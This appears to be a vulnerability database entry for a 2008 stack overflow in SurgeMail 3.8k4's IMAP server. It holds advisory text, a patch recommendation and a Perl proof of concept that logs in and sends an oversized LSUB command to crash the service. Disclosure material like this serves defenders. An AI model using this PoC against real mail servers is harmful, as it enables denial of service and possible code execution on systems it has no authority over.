SurgeMail Remote Stack-Based Buffer Overflow Vulnerability

vendor:

SurgeMail

by:

Leon Juranic

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: SurgeMail

Affected Version From: 3.8k4

Affected Version To: 3.8k4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SurgeMail Remote Stack-Based Buffer Overflow Vulnerability

SurgeMail is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input. Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected service. Failed exploit attempts will likely result in denial-of-service conditions.

Mitigation:

Apply the latest security patches and update to the latest version of SurgeMail.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28377/info

SurgeMail is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.

Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected service. Failed exploit attempts will likely result in denial-of-service conditions.

SurgeMail 3.8k4 is vulnerable; other versions may also be affected.

#
#
#       Surgemail stack overflow PoC exploit - latest version
#	Coded by Leon Juranic <leon.juranic@infigo.hr>
#	http://www.infigo.hr/en/
#

use IO::Socket;


$host = "192.168.0.15";
$user = "test";
$pass = "test";
$str = "//AA:";

$sock = IO::Socket::INET->new(PeerAddr => $host,
        PeerPort => "143",
        Proto    => "tcp") || die ("Cannot connect!!!\n");



        print $a = <$sock>;
        print $sock "a001 LOGIN $user $pass\r\n";
        print $a = <$sock>;
        print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";
        print $a = <$sock>;